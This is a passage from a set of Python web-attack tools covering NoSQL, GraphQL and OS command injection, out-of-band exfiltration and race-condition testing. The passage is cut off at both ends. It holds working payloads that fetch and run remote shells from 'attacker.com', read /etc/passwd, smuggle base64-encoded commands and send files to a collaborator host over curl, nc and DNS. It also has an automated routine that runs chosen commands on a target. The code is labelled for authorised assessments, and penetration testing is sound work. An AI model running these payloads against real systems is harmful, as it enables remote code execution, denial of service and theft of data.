                condition = f'this.password.charAt({i-1}) == "{char}"'
                start_time = time.monotonic()
                self.session.post(
                    self.target_url,
                    # Built as a dict so the inner quotes are escaped by json
                    json={self.param_name: {'$where': condition}},
                    timeout=10
                )
                elapsed = time.monotonic() - start_time
                if elapsed > 2:  # Threshold for time-based
                    found_char = char
                    extracted_data += char
                    print(f"[+] Found char {i}: {char}")
                    break
            if not found_char:
                break
        return extracted_data

    def test_operator_injection(self):
        """Test for MongoDB operator injection.

        Posts ``{"filter": {<operator>: [1, 1]}}`` for each operator and
        records those answered with HTTP 200 and a non-empty JSON body.
        """
        operators = [
            # Comparison
            '$eq', '$ne', '$gt', '$gte', '$lt', '$lte', '$in', '$nin',
            # Logical
            '$and', '$or', '$not', '$nor',
            # Element
            '$exists', '$type',
            # Evaluation
            '$expr', '$jsonSchema', '$mod', '$regex', '$text', '$where',
            # Geospatial
            '$geoIntersects', '$geoWithin', '$near', '$nearSphere',
            # Array
            '$all', '$elemMatch', '$size',
            # Bitwise
            '$bitsAllClear', '$bitsAllSet', '$bitsAnyClear', '$bitsAnySet'
        ]
        vulnerabilities = []
        for operator in operators:
            payload = f'{{"{operator}": [1, 1]}}'
            response = self.session.post(
                self.target_url,
                json={'filter': {operator: [1, 1]}}
            )
            if response.status_code != 200:
                continue
            try:
                data = response.json()
                # Look for signs of operator execution
                if data and len(data) > 0:
                    vulnerabilities.append({
                        'operator': operator,
                        'payload': payload,
                        'result_count': len(data)
                    })
            except (ValueError, TypeError):
                # Not JSON, or a JSON scalar without a length: no evidence.
                continue
        return vulnerabilities
# Usage: POST every payload as JSON and report the categories that hit.
injector = MongoDBInjector("http://target.com/api/users")
vulns = injector.test_injection_point(method='POST', data_type='json')
for vuln in vulns:
    print(f"[!] Vulnerability found: {vuln['category']}")
#!/usr/bin/env python3
"""
GraphQL Injection Testing Framework
Includes introspection abuse, query batching, and persisted query attacks
"""
import requests
import json
import re
class GraphQLInjector:
    """GraphQL security tester (introspection, complexity, persisted queries).

    Intended for authorized assessments only.
    """

    # Schema query used by every introspection-based check.
    INTROSPECTION_QUERY = """
    query IntrospectionQuery {
      __schema {
        types {
          name
          kind
          description
          fields {
            name
            description
            type {
              name
              kind
              ofType { name kind }
            }
            args {
              name
              description
              type { name kind ofType { name kind } }
              defaultValue
            }
          }
        }
      }
    }
    """

    def __init__(self, endpoint, headers=None):
        """Store the endpoint and headers and open an HTTP session.

        Args:
            endpoint: URL of the GraphQL endpoint.
            headers: Headers sent with every request; when omitted a JSON
                ``Content-Type`` header is used.
        """
        self.endpoint = endpoint
        self.headers = headers or {'Content-Type': 'application/json'}
        self.session = requests.Session()

    def _fetch_schema(self):
        """Run the introspection query.

        Returns:
            The parsed response dict when it is HTTP 200, valid JSON and
            contains ``data.__schema``; otherwise ``None``.
        """
        response = self.session.post(
            self.endpoint,
            json={'query': self.INTROSPECTION_QUERY},
            headers=self.headers
        )
        if response.status_code != 200:
            return None
        try:
            schema = response.json()
        except ValueError:
            return None
        if not isinstance(schema, dict):
            return None
        if not (schema.get('data') or {}).get('__schema'):
            return None
        return schema

    @staticmethod
    def _schema_types(schema):
        """Return the ``types`` list of an introspection response ([] if absent)."""
        root = ((schema or {}).get('data') or {}).get('__schema') or {}
        return root.get('types') or []

    @staticmethod
    def _named_type(type_ref):
        """Return a type reference's name, unwrapping one NON_NULL/LIST level."""
        type_ref = type_ref or {}
        return type_ref.get('name') or (type_ref.get('ofType') or {}).get('name') or ''

    def introspection_abuse(self):
        """Use GraphQL introspection to gather schema information.

        Returns:
            ``{'schema_obtained': False}`` when no schema came back, else a
            dict with ``schema_obtained``, ``sensitive_fields`` and the
            first five ``malicious_queries``.
        """
        schema = self._fetch_schema()
        if schema is None:
            return {'schema_obtained': False}
        return {
            'schema_obtained': True,
            'sensitive_fields': self.find_sensitive_fields(schema),
            'malicious_queries': self.generate_malicious_queries(schema)[:5]  # First 5
        }

    def find_sensitive_fields(self, schema):
        """Identify potentially sensitive fields in schema.

        A field matches when its name or description contains one of the
        keywords (case-insensitive). A ``null`` description is treated as
        empty for matching and passed through unchanged in the result.
        """
        sensitive_keywords = [
            'password', 'email', 'token', 'secret', 'key',
            'credit', 'card', 'ssn', 'address', 'phone',
            'admin', 'role', 'permission', 'salary', 'private'
        ]
        sensitive = []
        for type_info in self._schema_types(schema):
            for field in type_info.get('fields') or []:
                field_name = (field.get('name') or '').lower()
                field_desc = (field.get('description') or '').lower()
                if any(keyword in field_name or keyword in field_desc
                       for keyword in sensitive_keywords):
                    sensitive.append({
                        'type': type_info['name'],
                        'field': field['name'],
                        'description': field.get('description', '')
                    })
        return sensitive

    def generate_malicious_queries(self, schema):
        """Generate probe queries based on schema.

        Returns:
            List of strings: one select-all query per non-introspection
            type with fields, one fixed nested query, and one JSON-encoded
            batch of 100 trivial queries.
        """
        queries = []
        # 1. Query for all data
        for type_info in self._schema_types(schema):
            if type_info.get('fields') and not type_info['name'].startswith('__'):
                fields = [field['name'] for field in type_info['fields']]
                queries.append(
                    f"query {{ {type_info['name'].lower()} {{ {' '.join(fields)} }} }}"
                )
        # 2. Nested queries (depth exploitation)
        queries.append("""
        query {
          users {
            id
            email
            posts {
              id
              content
              comments {
                id
                content
                author {
                  id
                  email
                }
              }
            }
          }
        }
        """)
        # 3. Batch queries (query batching attack)
        batch_query = [{'query': 'query { __typename }'} for _ in range(100)]
        queries.append(json.dumps(batch_query))
        return queries

    def test_query_complexity(self):
        """Test for query complexity/DoS limits with one deep and one wide query.

        Returns:
            List of dicts with ``test``, ``status_code``, ``response_time``
            and ``error`` (``'timeout'`` or ``None``).
        """
        # Very deep query
        deep_query = "query { " + "a { " * 100 + "__typename" + " }" * 100 + " }"
        # Very wide query
        wide_query = "query { " + " ".join([f"field{i}: __typename" for i in range(1000)]) + " }"
        results = []
        for name, query in [('deep', deep_query), ('wide', wide_query)]:
            try:
                response = self.session.post(
                    self.endpoint,
                    json={'query': query},
                    headers=self.headers,
                    timeout=30
                )
            except requests.exceptions.Timeout:
                results.append({
                    'test': name,
                    'status_code': 'TIMEOUT',
                    'response_time': 30,
                    'error': 'timeout'
                })
                continue
            seconds = response.elapsed.total_seconds()
            results.append({
                'test': name,
                'status_code': response.status_code,
                'response_time': seconds,
                'error': 'timeout' if seconds > 29 else None
            })
        return results

    def test_persisted_query_injection(self):
        """Probe guessable persisted-query IDs (hex, decimal, ``qNNNN``).

        Returns:
            List of ``{'id', 'response'}`` dicts for IDs answered with HTTP
            200, a ``data`` key and no errors. Non-JSON replies are skipped.
        """
        query_ids = []
        for i in range(1000):
            # Common patterns for persisted query IDs
            patterns = [
                f"{i:08x}",  # Hex
                f"{i}",  # Decimal
                f"q{i:04d}",  # q0001 format
            ]
            for pattern in patterns:
                response = self.session.post(
                    self.endpoint,
                    json={'queryId': pattern},
                    headers=self.headers
                )
                if response.status_code != 200:
                    continue
                try:
                    data = response.json()
                except ValueError:
                    continue
                if isinstance(data, dict) and 'data' in data and not data.get('errors'):
                    query_ids.append({
                        'id': pattern,
                        'response': data.get('data', {})
                    })
        return query_ids

    @staticmethod
    def _pair_lookup(pairs, key):
        """Return the value for ``key`` in a JSON object parsed as (key, value) pairs."""
        if isinstance(pairs, list):
            for item in pairs:
                if isinstance(item, tuple) and item[0] == key:
                    return item[1]
        return None

    def test_field_duplication(self):
        """Test whether a repeated field is repeated in the response.

        The body is parsed with ``object_pairs_hook=list`` because a normal
        dict collapses duplicate keys, which would hide the very thing
        being counted.
        """
        query = """
        query {
          user(id: "1") {
            email
            email
            email
            email
            email
          }
        }
        """
        response = self.session.post(
            self.endpoint,
            json={'query': query},
            headers=self.headers
        )
        if response.status_code == 200:
            try:
                pairs = json.loads(response.text, object_pairs_hook=list)
            except ValueError:
                return {'vulnerable': False}
            user_pairs = self._pair_lookup(self._pair_lookup(pairs, 'data'), 'user')
            emails = [
                item[1] for item in (user_pairs if isinstance(user_pairs, list) else [])
                if isinstance(item, tuple) and item[0] == 'email'
            ]
            if len(emails) > 1:
                return {
                    'vulnerable': True,
                    'duplicate_count': len(emails),
                    'values': emails
                }
        return {'vulnerable': False}

    def automated_injection_test(self):
        """Run all GraphQL tests and return their results keyed by test name."""
        results = {}
        print("[*] Testing introspection access")
        results['introspection'] = self.introspection_abuse()
        print("[*] Testing query complexity limits")
        results['complexity'] = self.test_query_complexity()
        print("[*] Testing persisted query attacks")
        results['persisted_queries'] = self.test_persisted_query_injection()
        print("[*] Testing field duplication")
        results['field_duplication'] = self.test_field_duplication()
        # Test for SQL injection through GraphQL arguments
        print("[*] Testing SQL injection in GraphQL arguments")
        results['sqli'] = self.test_graphql_sqli()
        return results

    def test_graphql_sqli(self):
        """Test for SQL injection in GraphQL ``String`` arguments.

        Fetches the raw schema, then sends each payload to every field
        argument whose (optionally non-null) type is ``String`` and records
        responses whose errors mention ``sql`` or ``syntax``.

        NOTE(review): fields of every type are queried as if they were
        root query fields; non-root fields will only yield validation
        errors.
        """
        sqli_payloads = [
            "' OR '1'='1",
            "admin'--",
            # NOTE(review): destructive if it ever executes; confirm scope.
            "1; DROP TABLE users--",
            "1' AND SLEEP(5)--"
        ]
        vulnerable_endpoints = []
        schema = self._fetch_schema()
        if schema is None:
            return vulnerable_endpoints
        for type_info in self._schema_types(schema):
            for field in type_info.get('fields') or []:
                for arg in field.get('args') or []:
                    if self._named_type(arg.get('type')) != 'String':
                        continue
                    template = f"""
                    query {{
                      {field['name']}({arg['name']}: "PAYLOAD") {{
                        id
                      }}
                    }}
                    """
                    for payload in sqli_payloads:
                        response = self.session.post(
                            self.endpoint,
                            json={'query': template.replace('PAYLOAD', payload)},
                            headers=self.headers,
                            timeout=10
                        )
                        if response.status_code != 200:
                            continue
                        try:
                            data = response.json()
                        except ValueError:
                            continue
                        errors = (data.get('errors') if isinstance(data, dict) else None) or []
                        # Check for SQL errors
                        if any('sql' in str(error).lower() or
                               'syntax' in str(error).lower()
                               for error in errors):
                            vulnerable_endpoints.append({
                                'query': field['name'],
                                'argument': arg['name'],
                                'payload': payload,
                                'error': str(errors[0])[:200]
                            })
        return vulnerable_endpoints
# Usage: run every GraphQL check with a bearer token and dump the results.
# The headers passed here replace the constructor's default header dict.
gql = GraphQLInjector("http://target.com/graphql",
                      headers={'Authorization': 'Bearer token'})
results = gql.automated_injection_test()
print(json.dumps(results, indent=2))
#!/usr/bin/env python3
"""
Advanced Command Injection Techniques with Filter Bypass
Includes encoding, whitespace variations, and command chaining
"""
import requests
import urllib.parse
import string
class CommandInjector:
    """OS command injection tester with filter-bypass payload variants.

    For authorized assessments only.
    """

    def __init__(self, target_url, vulnerable_param):
        """Store the target and build the payload catalogue.

        Args:
            target_url: Endpoint that receives the GET requests.
            vulnerable_param: Name of the query parameter under test.
        """
        self.target_url = target_url
        self.vulnerable_param = vulnerable_param
        self.session = requests.Session()
        # Command injection payloads with various bypass techniques
        self.payloads = {
            'basic': [
                ';id',
                '|id',
                '&id',
                '&&id',
                '||id',
                '`id`',
                '$(id)',
                '){id}',
            ],
            'whitespace_variations': [
                'id',
                'id',
                'i\\d',
                'i\\\td',
                'i\\\nd',
                '{i,d}',
                'i$@d',
                'i$()d',
                'i${IFS}d',
            ],
            'encoding': [
                # URL encoding
                '%3bid',
                '%7cid',
                '%26id',
                '%60id%60',
                '%24%28id%29',
                # Double URL encoding
                '%253bid',
                '%257cid',
                # Hex encoding
                '\\x3bid',
                '\\x7cid',
                # Octal encoding
                '\\073id',
                '\\174id',
                # Unicode encoding
                '%u003bid',
                '%u007cid',
            ],
            'case_variation': [
                'Id',
                'iD',
                'ID',
                'Id',
            ],
            'command_concatenation': [
                # NOTE(review): adjacent literals concatenate, so the next
                # entry evaluates to plain 'id'.
                'i''d',
                'i""d',
                'i\'\'d',
                'i$@d',
            ],
            'environment_variables': [
                '${PATH:0:1}id',
                '${LS_COLORS:10:1}id',
                '${PWD:0:1}id',
            ],
            # NOTE(review): the last entries of this list fetch and run
            # remote code on the target; keep them out of detection scans
            # unless the rules of engagement explicitly allow it.
            'advanced_chaining': [
                '; id; #',
                '| id |',
                '& id &',
                '&& id &&',
                '|| id ||',
                '`id` #',
                '$(id) #',
                '){ id; }',
                '; id && echo vulnerable',
                '| id | grep -i root',
                '& cat /etc/passwd &',
                '; ping -c 1 attacker.com;',
                '; curl attacker.com/shell.sh | bash;',
                '; wget attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh;',
            ],
            'blind_injection': [
                '; sleep 5;',
                '| sleep 5 |',
                '& sleep 5 &',
                '`sleep 5`',
                '$(sleep 5)',
                '; ping -c 5 127.0.0.1;',
                '; cat /dev/zero | head -c 1000000;',
            ],
            'filter_bypass': [
                # Bypass "cat" filter
                'c\\at',
                'c""at',
                'c\'\'at',
                'c$@at',
                'c${IFS}at',
                'ca\t',
                'c\\a\\t',
                '/???/??t',  # /bin/cat
                '/?in/?at',
                # Bypass space filter
                'cat${IFS}/etc/passwd',
                'cat</etc/passwd',
                'cat<>/etc/passwd',
                '{cat,/etc/passwd}',
                'cat$@/etc/passwd',
                # Was a syntax error: the inner quotes ended the literal early.
                "X=$'\\x20'&&cat$X/etc/passwd",
                # Bypass slash filter
                'cat /etc/passwd',
                'cat etc/passwd',  # Relative path
                'cat .//etc//passwd',
                'cat /???/??????',  # /etc/passwd
                # Bypass keyword filters with encoding
                '$(echo${IFS}Y2F0IC9ldGMvcGFzc3dkCg==|base64${IFS}-d|bash)',
                '`echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d`',
            ]
        }

    def test_all_payloads(self, base_value='127.0.0.1'):
        """Test all payload categories.

        Args:
            base_value: Benign value each payload is appended to; a falsy
                value sends the payload alone.

        Returns:
            Dict mapping category to the list of payloads that showed an
            injection indicator.
        """
        results = {}
        for category, payload_list in self.payloads.items():
            print(f"[*] Testing {category} payloads")
            category_results = []
            for payload in payload_list:
                injection = f"{base_value}{payload}" if base_value else payload
                result = self.test_payload(injection)
                if result['indicators']['injection_detected']:
                    category_results.append({
                        'payload': payload,
                        'response_time': result['response_time'],
                        'status_code': result['status_code'],
                        'indicators': result['indicators']['detected_indicators']
                    })
            results[category] = category_results
        return results

    def test_payload(self, injection):
        """Send a single payload and analyse the response.

        The value is passed through ``params`` so the HTTP client performs
        the URL encoding.

        Returns:
            Dict with ``payload``, ``status_code``, ``response_time``,
            ``response_length``, ``response_text`` and ``indicators``. A
            client timeout is reported as a detection with the same keys.
        """
        import time

        params = {self.vulnerable_param: injection}
        # Measure response time for blind injection detection
        start_time = time.time()
        try:
            response = self.session.get(
                self.target_url,
                params=params,
                timeout=10
            )
        except requests.exceptions.Timeout:
            return {
                'payload': injection,
                'status_code': 'TIMEOUT',
                'response_time': 10,
                'response_length': 0,
                'response_text': '',
                'indicators': {
                    'injection_detected': True,
                    'detected_indicators': ['timeout'],
                    'timeout': True
                }
            }
        response_time = time.time() - start_time
        return {
            'payload': injection,
            'status_code': response.status_code,
            'response_time': response_time,
            'response_length': len(response.text),
            'response_text': response.text,
            'indicators': self.analyze_response(response, response_time)
        }

    def analyze_response(self, response, response_time):
        """Analyze response for command injection indicators.

        Matching is case-insensitive: both the body and each indicator are
        lower-cased before comparison. Matched indicators are reported in
        their original spelling.

        Returns:
            Dict with ``injection_detected`` (bool) and
            ``detected_indicators`` (list of strings).
        """
        indicators = {
            'injection_detected': False,
            'detected_indicators': []
        }
        response_text = response.text.lower()
        # Check for command output in response
        command_output_indicators = [
            'root:x:0:0',
            'uid=',
            'gid=',
            'groups=',
            'bin/bash',
            '/home/',
            'www-data',
            'daemon',
            'nobody',
            'Linux',
            'Unix',
            'kernel',
            'total ',
            'drwx',
            '-rw-',
            'ls: cannot access',
            'command not found',
            'Permission denied',
            'No such file or directory'
        ]
        for indicator in command_output_indicators:
            if indicator.lower() in response_text:
                indicators['detected_indicators'].append(indicator)
                indicators['injection_detected'] = True
        # Check for time-based indicators
        if response_time > 4.5:  # For sleep 5 payloads
            indicators['detected_indicators'].append(f'Time delay: {response_time}s')
            indicators['injection_detected'] = True
        # Check for error messages that indicate command execution
        error_indicators = [
            'sh:',
            'bash:',
            'dash:',
            'ksh:',
            'zsh:',
            '/bin/sh:',
            '/bin/bash:'
        ]
        for error in error_indicators:
            if error in response_text:
                indicators['detected_indicators'].append(error)
                indicators['injection_detected'] = True
        return indicators

    def automated_exploitation(self, command):
        """Run ``command`` through the first payload that showed an indicator.

        Returns:
            ``{"error": ...}`` when no payload worked, otherwise a list with
            one result dict per command variant tried.
        """
        # Find a working payload first
        working_payloads = []
        for category, payload_list in self.payloads.items():
            for payload in payload_list[:5]:  # Test first 5 from each category
                test_result = self.test_payload(f"127.0.0.1{payload}")
                if test_result['indicators']['injection_detected']:
                    working_payloads.append(payload)
                    break
        if not working_payloads:
            return {"error": "No working payload found"}
        # Use first working payload to execute command
        working_payload = working_payloads[0]
        # Command variants (for filters)
        encoded_commands = [
            command,
            f"echo {command} | bash",
            f"echo {command} | sh",
            f"{command} 2>&1",
            f"$(echo {command})"
        ]
        results = []
        for cmd in encoded_commands:
            injection = f"127.0.0.1{working_payload.replace('id', cmd)}"
            result = self.test_payload(injection)
            if result['indicators']['injection_detected']:
                results.append({
                    'command': cmd,
                    'success': True,
                    'response_preview': result.get('response_text', '')[:500]
                })
            else:
                results.append({
                    'command': cmd,
                    'success': False
                })
        return results
# Usage: try every payload category and show up to three hits per category.
injector = CommandInjector("http://target.com/ping", "ip")
results = injector.test_all_payloads()
for category, payloads in results.items():
    if not payloads:
        continue
    print(f"\n[!] {category} - {len(payloads)} successful payloads")
    for p in payloads[:3]:  # Show first 3
        print(f" - {p['payload']} ({p['response_time']:.2f}s)")
#!/usr/bin/env python3
"""
Out-of-Band (OOB) Command Injection Detection
Uses DNS, HTTP, and other protocols to confirm injection
"""
import requests
import time
import dns.resolver
from urllib.parse import quote
import subprocess
import threading
class OOBCommandInjector:
def __init__(self, target_url, param_name, collaborator_url=None):
self.target_url = target_url
self.param_name = param_name
self.collaborator = collaborator_url or self.setup_interactsh()
self.session = requests.Session()
# OOB payloads for different protocols
self.oob_payloads = {
'dns': [
# DNS lookup
'; nslookup $(whoami).{collaborator}',
'| nslookup $(id).{collaborator}',
'`nslookup $(hostname).{collaborator}`',
# Dig
'; dig $(cat /etc/passwd | base64).{collaborator}',
'| dig $(uname -a | base64).{collaborator}',
# Ping with DNS
'; ping -c 1 $(whoami).{collaborator}',
],
'http': [
# Curl/wget
'; curl http://{collaborator}/$(whoami)',
'| wget http://{collaborator}/$(id)',
'`curl http://{collaborator}/$(hostname)`',
# With data exfiltration
'; curl -X POST http://{collaborator} -d "$(cat /etc/passwd | base64)"',
'| wget --post-data="$(uname -a)" http://{collaborator}',
# Using netcat
'; cat /etc/passwd | base64 | nc {collaborator} 80',
],
'icmp': [
# Ping with data in size
'; ping -c 1 -s $(expr $(whoami | wc -c) + 8) {collaborator}',
'| ping -c 1 -p $(printf "%x" $(id | sum | cut -f1 -d" ")) {collaborator}',
],
'nslookup_python': [
# Python one-liners
'; python3 -c "import os; import socket; socket.gethostbyname(os.popen(\'whoami\').read().strip() + \'.{collaborator}\')"',
'| python3 -c "import os; import urllib.request; urllib.request.urlopen(\'http://{collaborator}/\'.join(os.popen(\'id\').read()))"',
],
'blind_with_delay': [
# Time-based with DNS (will cause delay on DNS resolution failure)
'; ping -c 1 $(whoami).{collaborator} || sleep 5',
'| nslookup $(id).{collaborator} || sleep 5',
]
}
def setup_interactsh(self):
"""Set up InteractSH server for OOB testing"""
try:
# Start InteractSH client
import tempfile
import os
# Create temporary directory for InteractSH
temp_dir = tempfile.mkdtemp()
client_path = os.path.join(temp_dir, 'interactsh-client')
# Download interactsh-client if not exists
# Note: In real use, you would have this pre-installed
print("[*] Note: Install interactsh-client from https://github.com/projectdiscovery/interactsh")
# For demo, we'll use a placeholder
return "your-subdomain.interact.sh"
except Exception as e:
print(f"[-] InteractSH setup failed: {e}")
return "attacker-controlled-domain.com"
def monitor_interactions(self, duration=60):
"""Monitor for interactions with collaborator"""
interactions = []
# In real implementation, you would:
# 1. Start InteractSH client
# 2. Monitor for DNS/HTTP interactions
# 3. Parse incoming data
print(f"[*] Monitoring for interactions for {duration} seconds...")
print("[*] In real scenario, this would connect to InteractSH server")
# Simulated monitoring
time.sleep(duration)
# Return simulated interactions for demo
simulated_interactions = [
{
'type': 'dns',
'timestamp': time.time(),
'data': 'root.d3b4a1c2.interact.sh',
'protocol': 'DNS'
},
{
'type': 'http',
'timestamp': time.time() + 5,
'data': 'GET /root HTTP/1.1',
'protocol': 'HTTP'
}
]
return simulated_interactions
def test_oob_injection(self):
"""Test for OOB command injection"""
results = []
# Start monitoring in background
monitor_thread = threading.Thread(
target=self.monitor_interactions,
args=(120,)
)
monitor_thread.start()
# Send payloads
for protocol, payload_list in self.oob_payloads.items():
print(f"[*] Testing {protocol} OOB payloads")
for payload_template in payload_list[:3]: # Test first 3
payload = payload_template.format(collaborator=self.collaborator)
encoded_payload = quote(payload)
# Send request
params = {self.param_name: payload}
try:
response = self.session.get(
self.target_url,
params=params,
timeout=10
)
results.append({
'protocol': protocol,
'payload': payload[:100],
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds()
})
print(f" [+] Sent {protocol} payload: {payload[:50]}...")
except Exception as e:
results.append({
'protocol': protocol,
'payload': payload[:100],
'error': str(e)
})
time.sleep(1) # Rate limiting
# Wait for monitoring to complete
monitor_thread.join()
# Get interactions
interactions = self.monitor_interactions()
return {
'sent_payloads': results,
'interactions': interactions,
'oob_detected': len(interactions) > 0
}
def automated_data_exfiltration(self, file_path):
    """Send each OOB exfiltration payload for ``file_path`` and log the outcome.

    Every payload template is formatted with ``self.collaborator`` and sent
    as the ``self.param_name`` query parameter of ``self.target_url``. The
    method only records whether each request could be sent; it does not read
    anything back from the collaborator.

    Args:
        file_path: Path interpolated into the payload templates.

    Returns:
        One dict per template with ``method`` (first 50 characters of the
        unformatted template), ``status`` (``'sent'`` or ``'error'``) and
        either ``response_time`` or ``error``.
    """
    # Doubled braces survive the f-string so that .format() below can fill in
    # the collaborator host.
    exfiltration_methods = [
        # Base64 encoding via DNS
        f'; cat {file_path} | base64 | tr -d "\\n" | fold -w 63 | while read chunk; do nslookup $chunk.{{collaborator}}; done',
        # HTTP POST
        f'; curl -X POST http://{{collaborator}}/exfil -d "$(cat {file_path} | base64)"',
        # Using xxd for hex encoding
        f'; xxd -p {file_path} | tr -d "\\n" | fold -w 60 | while read chunk; do ping -c 1 $chunk.{{collaborator}}; done',
        # Python one-liner for large files
        f'; python3 -c "import urllib.request, base64; urllib.request.urlopen(\'http://{{collaborator}}/\' + base64.b64encode(open(\'{file_path}\', \'rb\').read()).decode())"',
    ]

    outcomes = []
    for template in exfiltration_methods:
        payload = template.format(collaborator=self.collaborator)
        print(f"[*] Testing exfiltration: {payload[:80]}...")
        query = {self.param_name: payload}
        try:
            response = self.session.get(
                self.target_url,
                params=query,
                timeout=30
            )
            entry = {
                'method': template[:50],
                'status': 'sent',
                'response_time': response.elapsed.total_seconds()
            }
        except Exception as e:
            entry = {
                'method': template[:50],
                'status': 'error',
                'error': str(e)
            }
        outcomes.append(entry)
        time.sleep(2)

    # Placeholder wait; received data would be parsed from the collaborator
    # server in a real implementation.
    print("[*] Monitoring for exfiltrated data...")
    time.sleep(30)
    return outcomes
# Usage: run the OOB injection test against a sample target and print any
# collaborator interactions that were recorded.
oob_tester = OOBCommandInjector(
    "http://target.com/run",
    "cmd",
    collaborator="your-domain.interact.sh"
)
results = oob_tester.test_oob_injection()
if results['oob_detected']:
    print("[!] OOB Command Injection detected!")
    for interaction in results['interactions']:
        print(f" [+] {interaction['protocol']}: {interaction['data']}")

#!/usr/bin/env python3
"""
Advanced Race Condition Testing Framework
Tests for TOCTOU, limit bypass, and concurrency vulnerabilities
"""
import asyncio
import aiohttp
import time
from typing import List, Dict
import statistics
class RaceConditionTester:
    """Send bursts of near-simultaneous HTTP requests and flag suspicious results.

    Every ``test_*`` coroutine builds a request template, replays it through
    :meth:`send_concurrent_requests`, counts HTTP 200 responses and appends a
    result dict with a boolean ``vulnerable`` verdict to ``self.results``.
    The verdicts are status-code heuristics and need manual confirmation.
    """

    def __init__(self, target_url, session_cookies=None):
        """
        Args:
            target_url: Base URL that endpoint paths are appended to.
            session_cookies: Optional cookie dict sent with every request.
        """
        self.target_url = target_url
        self.cookies = session_cookies or {}
        self.results = []

    @staticmethod
    def _is_success(resp):
        """True for a response dict carrying HTTP status 200."""
        return isinstance(resp, dict) and resp.get('status') == 200

    async def send_concurrent_requests(self,
                                       request_template,
                                       concurrency=10,
                                       total_requests=100):
        """Send ``total_requests`` copies of the template in concurrent batches.

        Args:
            request_template: Request dict; see :meth:`send_request` for keys.
            concurrency: Number of requests awaited together per batch.
            total_requests: Total number of requests to send.

        Returns:
            Responses in request order: the dicts produced by
            :meth:`send_request`, or exception objects for anything that
            escaped it.

        Raises:
            ValueError: If ``concurrency`` is smaller than 1.
        """
        if concurrency < 1:
            raise ValueError("concurrency must be at least 1")

        responses = []
        async with aiohttp.ClientSession(cookies=self.cookies) as session:
            for start in range(0, total_requests, concurrency):
                stop = min(start + concurrency, total_requests)
                batch = [
                    self.send_request(session, self.modify_request(request_template, index))
                    for index in range(start, stop)
                ]
                responses.extend(
                    await asyncio.gather(*batch, return_exceptions=True)
                )
                # Small delay between batches (not needed after the last one).
                if stop < total_requests:
                    await asyncio.sleep(0.1)
        return responses

    async def send_request(self, session, request):
        """Send one request and return a plain dict describing the outcome.

        Args:
            session: Open ``aiohttp.ClientSession``.
            request: Dict with ``method`` and ``url`` plus optional
                ``headers``, ``data`` and ``json``.

        Returns:
            ``{'status', 'text', 'headers'}`` on success, or
            ``{'error': message}`` if anything raised.
        """
        try:
            async with session.request(
                method=request['method'],
                url=request['url'],
                headers=request.get('headers', {}),
                data=request.get('data'),
                json=request.get('json')
            ) as response:
                return {
                    'status': response.status,
                    'text': await response.text(),
                    'headers': dict(response.headers)
                }
        except Exception as e:
            return {'error': str(e)}

    def modify_request(self, template, index):
        """Return a copy of ``template`` with ``UNIQUE`` markers replaced by ``index``.

        String values of a dict under ``data`` and the whole JSON-encoded
        dict under ``json`` (nested values included) are rewritten. The
        template itself is left untouched. Non-string form values are copied
        unchanged instead of raising.

        Args:
            template: Request template dict.
            index: Sequence number substituted for the marker.

        Returns:
            The per-request dict.
        """
        import json  # local: this script's import block does not import json

        marker = 'UNIQUE'
        replacement = str(index)
        request = template.copy()

        form = request.get('data')
        if isinstance(form, dict):
            request['data'] = {
                key: value.replace(marker, replacement) if isinstance(value, str) else value
                for key, value in form.items()
            }

        # Checked independently of ``data`` so that a template carrying
        # ``data=None`` next to a JSON body is still rewritten.
        body = request.get('json')
        if isinstance(body, dict):
            encoded = json.dumps(body)
            if marker in encoded:
                encoded = encoded.replace(marker, replacement)
            # The round trip also gives every request its own deep copy.
            request['json'] = json.loads(encoded)

        return request

    async def test_coupon_race(self, coupon_code, concurrency=20):
        """Apply one coupon ``concurrency * 2`` times concurrently.

        Posts to ``/api/apply-coupon`` with a distinct ``order_id`` per
        request. Flags the target when more than one request returned 200.

        Returns:
            Result dict (also appended to ``self.results``).
        """
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/apply-coupon',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'coupon_code': coupon_code,
                'order_id': 'ORDER_UNIQUE'
            }
        }
        print(f"[*] Testing coupon code race: {coupon_code}")
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency * 2
        )

        # Only dict responses are counted; raw exception objects are ignored.
        success_count = sum(1 for resp in responses if self._is_success(resp))
        error_count = sum(
            1 for resp in responses
            if isinstance(resp, dict) and resp.get('status') != 200
        )

        result = {
            'test': 'coupon_race',
            'coupon_code': coupon_code,
            'concurrency': concurrency,
            'success_count': success_count,
            'error_count': error_count,
            'vulnerable': success_count > 1  # Coupon used more than once
        }
        self.results.append(result)
        return result

    async def test_balance_transfer_race(self, from_account, to_account, amount, concurrency=15):
        """Submit ``concurrency`` identical transfers at once.

        Posts to ``/api/transfer`` with a distinct ``reference`` per request
        and collects the ``transfer_id`` of every 200 response. Flags the
        target when more than one distinct transfer went through.

        Returns:
            Result dict (also appended to ``self.results``).
        """
        import json  # local: this script's import block does not import json

        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/transfer',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'from_account': from_account,
                'to_account': to_account,
                'amount': amount,
                'reference': 'REF_UNIQUE'
            }
        }
        print(f"[*] Testing balance transfer race: {amount} from {from_account}")
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )

        successful_transfers = []
        for resp in responses:
            if not self._is_success(resp):
                continue
            try:
                data = json.loads(resp.get('text', '{}'))
                if 'transfer_id' in data:
                    successful_transfers.append(data['transfer_id'])
            except (ValueError, TypeError):
                # Body was not JSON (or not a container): count the success
                # but without a usable identifier.
                successful_transfers.append('unknown')

        result = {
            'test': 'balance_transfer_race',
            'from_account': from_account,
            'to_account': to_account,
            'amount': amount,
            'concurrency': concurrency,
            'successful_transfers': len(successful_transfers),
            'unique_transfers': len(set(successful_transfers)),
            'vulnerable': len(successful_transfers) > 1 and len(set(successful_transfers)) > 1
        }
        self.results.append(result)
        return result

    async def test_inventory_race(self, product_id, quantity=1, concurrency=25):
        """Issue ``concurrency * 2`` concurrent purchases of one product (TOCTOU).

        Posts to ``/api/purchase`` with a distinct ``customer_id`` per
        request. Flags the target when more than 10 purchases returned 200;
        the threshold is arbitrary and not tied to real stock levels.

        Returns:
            Result dict (also appended to ``self.results``).
        """
        request_template = {
